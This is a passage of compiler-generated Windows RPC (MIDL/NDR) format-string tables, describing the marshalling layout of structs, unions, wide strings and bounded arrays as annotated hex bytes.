/* 3142 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3144 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3146 */	NdrFcShort( 0x20 ),	/* 32 */
/* 3148 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3150 */	NdrFcShort( 0xa ),	/* Offset= 10 (3160) */
/* 3152 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3154 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3156 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3158 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 3160 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3162 */	NdrFcShort( 0xffc4 ),	/* Offset= -60 (3102) */
/* 3164 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 3166 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3168) */
/* 3168 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3170 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 3172 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 3174 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3176 */	0x0 ,
			0x0,		/* 0 */
/* 3178 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3182 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3186 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3188) */
/* 3188 */	NdrFcShort( 0x8 ),	/* 8 */
/* 3190 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3192 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3196 */	NdrFcShort( 0x54 ),	/* Offset= 84 (3280) */
/* 3198 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3197) */
/* 3200 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3202 */	NdrFcShort( 0x18 ),	/* 24 */
/* 3204 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3206 */	NdrFcShort( 0x8 ),	/* Offset= 8 (3214) */
/* 3208 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 3210 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3212 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3214 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3216 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3218 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3220 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3222 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 3224 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3226 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3228 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3230 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3232 */	0x0 ,
			0x0,		/* 0 */
/* 3234 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3238 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3242 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 3246 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 3248 */	0x0 ,
			0x0,		/* 0 */
/* 3250 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3254 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3258 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3260 */	NdrFcShort( 0xffc4 ),	/* Offset= -60 (3200) */
/* 3262 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3264 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3266 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3268 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3270 */	NdrFcShort( 0x6 ),	/* Offset= 6 (3276) */
/* 3272 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 3274 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 3276 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3278 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (3222) */
/* 3280 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3282 */	NdrFcShort( 0x8 ),	/* 8 */
/* 3284 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3286 */	NdrFcShort( 0x4 ),	/* Offset= 4 (3290) */
/* 3288 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 3290 */
			0x12, 0x0,	/* FC_UP */
/* 3292 */	NdrFcShort( 0xffe4 ),	/* Offset= -28 (3264) */
/* 3294 */
			0x11, 0x0,	/* FC_RP */
/* 3296 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3298) */
/* 3298 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3300 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 3302 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 3304 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3306 */	0x0 ,
			0x0,		/* 0 */
/* 3308 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3312 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3316 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3318) */
/* 3318 */	NdrFcShort( 0x20 ),	/* 32 */
/* 3320 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3322 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3326 */	NdrFcShort( 0x2e ),	/* Offset= 46 (3372) */
/* 3328 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3327) */
/* 3330 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 3332 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3334 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3336 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3338 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 3340 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 3342 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3346 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 3350 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 3354 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 3356 */	0x0 ,
			0x0,		/* 0 */
/* 3358 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3362 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3366 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3368 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3370 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3372 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3374 */	NdrFcShort( 0x20 ),	/* 32 */
/* 3376 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3378 */	NdrFcShort( 0xa ),	/* Offset= 10 (3388) */
/* 3380 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3382 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 3384 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 3386 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3388 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3390 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3392 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3394 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (3330) */
/* 3396 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 3398 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3400) */
/* 3400 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3402 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 3404 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 3406 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3408 */	0x0 ,
			0x0,		/* 0 */
/* 3410 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3414 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3418 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3420) */
/* 3420 */	NdrFcShort( 0x4 ),	/* 4 */
/* 3422 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3424 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3428 */	NdrFcShort( 0x4 ),	/* Offset= 4 (3432) */
/* 3430 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3429) */
/* 3432 */
			0x15,		/* FC_STRUCT */
			0x3,		/* 3 */
/* 3434 */	NdrFcShort( 0x4 ),	/* 4 */
/* 3436 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 3438 */
			0x11, 0x0,	/* FC_RP */
/* 3440 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3442) */
/* 3442 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3444 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 3446 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 3448 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3450 */	0x0 ,
			0x0,		/* 0 */
/* 3452 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3456 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3460 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3462) */
/* 3462 */	NdrFcShort( 0x18 ),	/* 24 */
/* 3464 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3466 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3470 */	NdrFcShort( 0x4 ),	/* Offset= 4 (3474) */
/* 3472 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3471) */
/* 3474 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3476 */	NdrFcShort( 0x18 ),	/* 24 */
/* 3478 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3480 */	NdrFcShort( 0x8 ),	/* Offset= 8 (3488) */
/* 3482 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3484 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 3486 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3488 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3490 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3492 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3494 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3496 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 3498 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3500) */
/* 3500 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3502 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 3504 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 3506 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3508 */	0x0 ,
			0x0,		/* 0 */
/* 3510 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3514 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3518 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3520) */
/* 3520 */	NdrFcShort( 0x4 ),	/* 4 */
/* 3522 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3524 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3528 */	NdrFcShort( 0xffa0 ),	/* Offset= -96 (3432) */
/* 3530 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3529) */
/* 3532 */
			0x11, 0x0,	/* FC_RP */
/* 3534 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3536) */
/* 3536 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3538 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 3540 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 3542 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3544 */	0x0 ,
			0x0,		/* 0 */
/* 3546 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3550 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3554 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3556) */
/* 3556 */	NdrFcShort( 0x8 ),	/* 8 */
/* 3558 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3560 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3564 */	NdrFcShort( 0x4 ),	/* Offset= 4 (3568) */
/* 3566 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3565) */
/* 3568 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3570 */	NdrFcShort( 0x8 ),	/* 8 */
/* 3572 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3574 */	NdrFcShort( 0x4 ),	/* Offset= 4 (3578) */
/* 3576 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 3578 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3580 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3582 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 3584 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3586) */
/* 3586 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3588 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 3590 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 3592 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3594 */	0x0 ,
			0x0,		/* 0 */
/* 3596 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3600 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3604 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3606) */
/* 3606 */	NdrFcShort( 0x4 ),	/* 4 */
/* 3608 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3610 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3614 */	NdrFcShort( 0xff4a ),	/* Offset= -182 (3432) */
/* 3616 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3615) */
/* 3618 */
			0x11, 0x0,	/* FC_RP */
/* 3620 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3622) */
/* 3622 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3624 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 3626 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 3628 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3630 */	0x0 ,
			0x0,		/* 0 */
/* 3632 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3636 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3640 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3642) */
/* 3642 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3644 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3646 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3650 */	NdrFcShort( 0x4 ),	/* Offset= 4 (3654) */
/* 3652 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3651) */
/* 3654 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3656 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3658 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3660 */	NdrFcShort( 0x6 ),	/* Offset= 6 (3666) */
/* 3662 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 3664 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 3666 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3668 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3670 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 3672 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3674) */
/* 3674 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3676 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 3678 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 3680 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3682 */	0x0 ,
			0x0,		/* 0 */
/* 3684 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3688 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3692 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3694) */
/* 3694 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3696 */	NdrFcShort( 0x4 ),	/* 4 */
/* 3698 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3702 */	NdrFcShort( 0x64 ),	/* Offset= 100 (3802) */
/* 3704 */	NdrFcLong( 0x2 ),	/* 2 */
/* 3708 */	NdrFcShort( 0xd8 ),	/* Offset= 216 (3924) */
/* 3710 */	NdrFcLong( 0x3 ),	/* 3 */
/* 3714 */	NdrFcShort( 0x14c ),	/* Offset= 332 (4046) */
/* 3716 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 3720 */	NdrFcShort( 0x194 ),	/* Offset= 404 (4124) */
/* 3722 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3721) */
/* 3724 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3726 */	NdrFcShort( 0x30 ),	/* 48 */
/* 3728 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3730 */	NdrFcShort( 0xa ),	/* Offset= 10 (3740) */
/* 3732 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3734 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3736 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 3738 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 3740 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3742 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3744 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3746 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3748 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3750 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3752 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3754 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3756 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3758 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3760 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 3762 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3764 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3766 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3768 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 3770 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 3772 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3776 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 3780 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 3784 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 3786 */	0x0 ,
			0x0,		/* 0 */
/* 3788 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3792 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3796 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3798 */	NdrFcShort( 0xffb6 ),	/* Offset= -74 (3724) */
/* 3800 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3802 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3804 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3806 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3808 */	NdrFcShort( 0x6 ),	/* Offset= 6 (3814) */
/* 3810 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 3812 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 3814 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3816 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (3760) */
/* 3818 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3820 */	NdrFcShort( 0x88 ),	/* 136 */
/* 3822 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3824 */	NdrFcShort( 0x1e ),	/* Offset= 30 (3854) */
/* 3826 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3828 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3830 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3832 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 3834 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3836 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3838 */	NdrFcShort( 0xf10e ),	/* Offset= -3826 (12) */
/* 3840 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3842 */	NdrFcShort( 0xf10a ),	/* Offset= -3830 (12) */
/* 3844 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3846 */	NdrFcShort( 0xf106 ),	/* Offset= -3834 (12) */
/* 3848 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3850 */	NdrFcShort( 0xf102 ),	/* Offset= -3838 (12) */
/* 3852 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 3854 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3856 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3858 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3860 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3862 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3864 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3866 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3868 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3870 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3872 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3874 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3876 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3878 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3880 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3882 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 3884 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3886 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3888 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3890 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 3892 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 3894 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3898 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 3902 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 3906 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 3908 */	0x0 ,
			0x0,		/* 0 */
/* 3910 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3914 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3918 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3920 */	NdrFcShort( 0xff9a ),	/* Offset= -102 (3818) */
/* 3922 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3924 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3926 */	NdrFcShort( 0x10 ),	/* 16 */
/* 3928 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3930 */	NdrFcShort( 0x6 ),	/* Offset= 6 (3936) */
/* 3932 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 3934 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 3936 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3938 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (3882) */
/* 3940 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 3942 */	NdrFcShort( 0x88 ),	/* 136 */
/* 3944 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3946 */	NdrFcShort( 0x1e ),	/* Offset= 30 (3976) */
/* 3948 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3950 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3952 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3954 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 3956 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3958 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 3960 */	0x0,		/* 0 */
			NdrFcShort( 0xf093 ),	/* Offset= -3949 (12) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 3964 */	0x0,		/* 0 */
			NdrFcShort( 0xf08f ),	/* Offset= -3953 (12) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 3968 */	0x0,		/* 0 */
			NdrFcShort( 0xf08b ),	/* Offset= -3957 (12) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 3972 */	0x0,		/* 0 */
			NdrFcShort( 0xf087 ),	/* Offset= -3961 (12) */
			0x5b,		/* FC_END */
/* 3976 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3978 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3980 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3982 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3984 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3986 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3988 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3990 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3992 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3994 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 3996 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3998 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4000 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 4002 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 4004 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 4006 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4008 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 4010 */	NdrFcShort( 0x0 ),	/* 0 */
/* 4012 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 4014 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 4016 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4020 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 4024 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 4028 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 4030 */	0x0 ,
			0x0,		/* 0 */
/* 4032 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4036 */	NdrFcLong( 0x0 ),	/* 0 */
/* 4040 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
